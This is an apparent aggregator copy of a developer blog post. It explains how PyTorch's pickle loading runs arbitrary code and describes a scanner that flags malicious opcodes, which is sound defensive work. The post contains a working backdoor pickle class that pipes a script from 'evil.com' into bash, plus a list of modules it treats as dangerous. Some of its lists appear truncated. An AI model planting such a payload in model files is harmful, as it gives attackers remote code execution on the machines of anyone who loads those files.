{"slug": "your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner", "title": "Your PyTorch Model File Can Execute Arbitrary Code — Here's How I Built a Scanner to Detect It", "summary": "PyTorch's `torch.load()` function uses the Python pickle format for serialization, which can execute arbitrary code embedded in a file when it is loaded, making it trivially exploitable for remote code execution (RCE) attacks. The author built a scanner called Model-Supply-Chain-Auditor that disassembles pickle bytecode using Python's `pickletools` module to detect malicious patterns like dangerous imports (e.g., `os.system`) and REDUCE opcodes, without executing the file. The article emphasizes that while detection is reactive, the proactive defense is cryptographic model signing, and warns that every `.pt` file from untrusted sources is a potential attack vector.", "body_md": "Every time you run torch.load(\"model.pt\"), you're executing arbitrary Python code. Not \"could theoretically execute\": actually executing. The pickle format that PyTorch uses for serialization has a built-in code execution mechanism, and it's trivial to exploit.\nI built a tool to detect this. Here's what I learned.\nThe Attack: 4 Lines of Code\nimport pickle, os\nclass Backdoor:\n    def __reduce__(self):\n        # pickle calls the returned callable with the returned args at load time\n        return (os.system, (\"curl http://evil.com/shell.sh | bash\",))\npayload = pickle.dumps(Backdoor())\nThat's it. When someone loads this pickle, whether it's disguised as a model checkpoint, a dataset, or a config file, the command executes. No warnings. No prompts. Full RCE.\nThe `__reduce__` method tells pickle how to reconstruct an object. But \"reconstruct\" means \"call this function with these arguments.\" Any function. Any arguments.\nWhy This Matters for ML\nML models are distributed as serialized files:\nIn 2023, HuggingFace found malicious pickles in uploaded models. 
This isn't theoretical; it's happening.\nHow Detection Works: Opcode Disassembly\nPython's pickletools module can disassemble pickle bytecode without executing it. Here's what a malicious pickle looks like at the opcode level:\nPROTO 4\nFRAME 25\nSHORT_BINUNICODE 'nt' ← module name (os on Windows)\nSHORT_BINUNICODE 'system' ← function name\nSTACK_GLOBAL ← load nt.system as callable\nSHORT_BINUNICODE 'whoami' ← argument\nTUPLE1 ← pack into tuple\nREDUCE ← CALL the function\nSTOP\nThe key insight: STACK_GLOBAL loads a callable by module + name, and REDUCE executes it. If the module is os (which appears as nt or posix in the bytecode), subprocess, socket, or builtins, treat the file as malicious.\nMy Scanner:\nI built Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor) to parse these opcodes and flag dangerous patterns:\nfrom src.scanners import scan_pickle_bytes\nresult = scan_pickle_bytes(suspicious_data)\nprint(result.risk_level) # \"malicious\"\nprint(result.findings) # [\"DANGEROUS import: nt.system\", \"Code execution via REDUCE\"]\nIt handles pickle protocols 0-5, including the protocol 4+ STACK_GLOBAL pattern where module and name are pushed to the stack separately.\nWhat I Got Wrong Initially\nOn Windows, os.system pickles as nt.system. On Linux, it's posix.system. My first version only checked for os and missed both platform-specific variants. Lesson: always test on actual bytecode output, not what you think it should be.\nThe Defense: Model Signing\nDetection is reactive. The proactive defense is cryptographic signing:\nIf the signature doesn't match, don't load it.\nWhat This Doesn't Solve\nThe Takeaway:\nIf you're downloading model files from the internet:\nThe ML community is slowly moving toward safer serialization. 
Until then, every .pt file is a potential attack vector.\nCode: github.com/poojakira/Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor)", "url": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner", "canonical_source": "https://dev.to/pooja_kiran_e3e03bf9ffeed/your-pytorch-model-file-can-execute-arbitrary-code-heres-how-i-built-a-scanner-to-detect-it-5cec", "published_at": "2026-05-19 03:02:18+00:00", "updated_at": "2026-05-19 03:33:06.172065+00:00", "lang": "en", "topics": ["cybersecurity", "machine-learning", "artificial-intelligence", "open-source", "developer-tools"], "entities": ["PyTorch", "HuggingFace"], "alternates": {"html": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner", "markdown": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner.md", "text": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner.txt", "jsonld": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner.jsonld"}}